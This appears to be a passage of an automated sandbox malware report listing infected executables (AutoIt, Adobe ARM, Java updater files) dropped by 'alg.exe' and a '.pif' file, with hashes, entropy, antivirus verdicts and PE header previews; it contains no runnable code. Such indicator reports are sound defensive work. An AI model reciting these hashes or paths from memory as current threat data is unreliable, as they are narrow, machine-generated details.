                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....(+......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.274148457091755
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:FMEhwdbTiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jKdHisqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4FFC8F29FE055E7C047B8113F7D55A34
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1AC8162DA5810D7A878879FAB7C31F573CFA3A65
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D3403F223C09D2CEF8C3EBFFA9948100AB50561DF9B9195EE5D7420FA53A55DE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AF8DC435603314C4D4B2FB3B5DBB0E32EE8A684BE74367D532E56A6313DACAB103CE082119E1855CFCA5E838CC457C66190AE7FDFBD7432BC82E8BA8D24103F
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !......E.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.64703754259372
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:KK0eqkSR7Xgo4TiRPnLWvJ+Dmg27RnWGj:KK0pR7Xn4TiRCvJ+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9270EACCEDA21F19CB9C60CFDB38F907
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6FB8814BE45CD290E5F877640FEF2386991C0CEE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8742DDA331826FE01F2FE90E8EEF44DDCA3A1276F2949D182FD8ED3131AF9DFD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:92A570A2171739B0C41373D2ACF1B63F1D34857D07975242B7E2B9C422BE843E5CB1E26378A2B5C4DD6582F0B4D8730D0340D957F3BC8CED558A5731CE70CA27
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....>.!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.565058999526638
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:/fYP1JsEDkSR7Xgo4TiRPnLWvJ+Dmg27RnWGj:3YPBR7Xn4TiRCvJ+D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6E5C263F060D9923598D43BA43C62549
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0CB24F9BCD1D265B173B7E36FFA2191CBAE5253D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98E74D41001B855AF8AEBBAA964902FB2F78E15F97ABB2CFA144B8E3D0E06934
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B4841FA202BA73D8D7C6F349007CD2A143061C1EF34F180671CC352343FEC1ABBC0E99ECFEE5FC7798F4FD7BAE964A023ADE77ED09FFD3DDFEE65758949E56FD
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......%... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1235717355783335
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:T62SYUcknnYXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:YYUcknYsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CE356AD8D8D5C5C962095A8A77EDDA28
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:43544F870B3C346582CEE0159EE4D7400DD03707
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C8410B8F77F9B58E6F3A45ED9550C03767F98B6767A97706AFA7DCA46F8B6B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3FD3877C55872A723C6C9318277B5CCCE873042A8D7D6D201E3EA194E50DCA96A4DD677E0C8511268021BDF4C5FFEB323DCA65CEB820D1EA933FFF79F90DE060
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@......t........................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.166672796290831
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:d+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSCDmg27RnWGj:vSktbpED527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7E1E764F744FDE8FB4FBD1990DA14C3C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:59FC567D4D92B83BF7868A3433609ADCFCA4C29A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F51F294C0E7B4107488689C47B21E1635F3F038D37D47AEC65C087953D6A6B3D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BFE88E18D1E803ED3299B79F4018C8F3F8633264B0D431F9B60E4A5D392D975AABAC3973F3F942CF9AA43082987DF1A31036B25489F3D9DE740608E5E45AC5A1
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.094621877297601
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:oGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLhDmg27RnWGj:44OEtwiICvYMRfBD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA84FF341112A3F7FE937B07B7FBFD16
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F667051D9D1061CE83EEF5761E2848FC73EAC76A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98A8B467CBB7E8876B8CF480E819B949B241E5A5997053A7C07F0102A2B85616
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:019158318CD101CD845B4A0B177558F9B8F3FE97524E0E9AA4363AE1676E985D4FFE5FE2768E7013B1ACA5A59CE82A91111D69DF521553875F7E933C78167733
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496414553076617
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:sAMuR+3kMbVjhWsqjnhMgeiCl7G0nehbGZpbD:1D+lbVjhaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1735D58F765270EADB00C02CBF590238
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AA495DB0BB4E4EFD8D8EF022B495A4671EBB4113
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DAABBEE559038C08D775AE48126D2CBB715FDC1F35667C34D880D4A94E7D5BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D067F757DA5425562A2692153A548DE4D8E14D0E0DB7C1C00BCC3C478453D1A2107E820FB72D404684A4129A2522041E5EB294CA7B14788C5F3FCC4B9BF6BEC0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.................................w>.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.277770136745501
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:mImGUcsvZZdubv7hfl3bXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlrsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3FD1AD658B714CCA2F0FD2124FF85001
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EEA5867B7CB807C661765531A7937C84EC6CC770
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:555756188BE428E1B1C27C9F4C7E0B56704B5B30F83962176568A01A9A455C3D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FC1EFC665EA8345637B1F3F8ED5253796D608EEEE042D819A0FAE0F490067F1A882F027EBB84C81C5982B73CCEA0DD6ACC5B61178E8D256645BAB2CCAFFA4CED
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.694818209825649
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:X0vHyeLj8trn3wsIsqjnhMgeiCl7G0nehbGZpbD:ytj4rgs0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EDEE587828281B128C70B47415D4B660
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C6D1D0ABBD01F62EC0A987D80E4626A2738E1AC0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:60C95B6AB27FB4B3287F57EA811A5DE08DCC6585366D705566E88F400D0B9E4E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7E74F7F57523BD7028DF469F832356BA249BE08459E560FAC873E718C824DD6EB8BE639A1F4391B5ABC68930CDA38B2A27057F1D8E8167D633597276B494F856
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......E.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.279684665870317
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:7oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZtsqjnhMgeiCl7G0nehbGZpv:y4i0wGJra0uAUfkVy7/ZRDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E412A15E4E6C07D0AC492B4D30DB0292
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FB0754CEF81AD6E3EA7E119189FAFAB72927B0B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:092852E29F8713CDEEC7AE3550FE54E3E5A74935231B9306CEA2F36A4AEE2A8E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FFF8EFF1A16FCA54F50918EA403359A19926114AC9DFA1F99D360A61D85F0E73B1B23B0A48A7C196916BF42C83E2E0FC9CE84B66EB4B232001CDFAA106B3D168
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................Y...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.448776007106288
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:oeR0gB6axoCf0R6RLQRF/TzJqe58BimesqjnhMgeiCl7G0nehbGZpbD:0gHxmR6uBTzge5MimyDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F6C99B4593023E510305EDC7BED1CB23
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4710300516C6638F519B9A03361BE1E76516E699
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3B3FF6FA30908D2CE879D3DA1D9A5B106A465BF63628EAD9FBABE14640F638C6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:33D3861715C9A9E2484E91CC8FF3EDC134037AC0EBE56A9A5BC29236F6F88FAEAEBFB6DA2019D6F53E0EC4F83800ED639B01085B3B328A706CC257B4155DCE18
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`......].......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4460725445166105
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:snEbH0j4x7R6SvyCM4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:skwOtO74sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:86835FD2FBCBE3EE930EE93610BCC936
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6B04A439EE3EFDDADAE1DF73BB6BDABE2974B4CF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD3E332220C4D55D740E77C74D487497AA92259241958A203CC952EC97EBDDCA
